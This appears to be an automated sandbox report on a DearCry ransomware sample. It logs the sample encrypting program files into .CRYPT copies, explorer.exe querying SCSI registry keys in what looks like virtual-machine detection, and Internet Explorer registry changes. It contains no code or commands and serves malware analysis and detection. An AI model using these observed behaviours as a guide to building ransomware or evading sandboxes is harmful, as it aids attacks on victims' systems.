File created C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libadf_plugin.dll.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libskiptags_plugin.dll.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\fr-FR\View3d\3DViewerProductDescription-universal.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\Microsoft.DiaSymReader.Native.amd64.dll.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\api-ms-win-core-localization-l1-2-0.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageSplashScreen.scale-150_contrast-white.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-black\WideTile.scale-125_contrast-black.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\mesa3d.md C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\Assets\contrast-white\MixedRealityPortalAppList.targetsize-16_altform-unplated_contrast-white.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Images\SkypeWideTile.scale-200_contrast-black.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxA-GoogleCloudCache.scale-150.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\hu-hu\ui-strings.js.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.187.41\msedgeupdateres_it.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\fr-fr\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\api-ms-win-crt-convert-l1-1-0.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\xmlrwbin_xl.dll.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ODATACPP.DLL C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Transit\contrast-black\MedTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\MicrosoftLogo.scale-200.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\icudt58.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Java\jre-1.8\bin\api-ms-win-core-processthreads-l1-1-1.dll.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\en-us\wintlim.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\root\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\nl-nl\ui-strings.js.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Redshift\lib\OpenSSL64.DllA\ssleay32.dll.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\System\mfc140u.dll.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\FirstRunMailBlurred.layoutdir-RTL.jpg C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-ae\ui-strings.js.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\da-dk\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarLogoExtensions.scale-48.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Work\contrast-black\LargeTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ThirdPartyNotices.MSHWLatin.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ja\UIAutomationClientSideProviders.resources.dll.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\1033\Client2019_eula.txt.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.DOC.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected] C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\RedistList\FrameworkList.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\root\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\api-ms-win-core-datetime-l1-1-0.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\sv-se\ui-strings.js.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\de-de\ui-strings.js.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\plugin.js.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Net.WebClient.dll.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\api-ms-win-crt-utility-l1-1-0.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Wide310x150Logo.scale-150.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\Assets\contrast-white\PeopleSplashScreen.scale-200.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\snooze.contrast-black.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\StoreLogo.scale-100.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\vscroll-thumb.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\es\UIAutomationClient.resources.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\7-Zip\7-zip.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\de\UIAutomationClientSideProviders.resources.dll.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ru\System.Windows.Controls.Ribbon.resources.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID C:\Windows\explorer.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
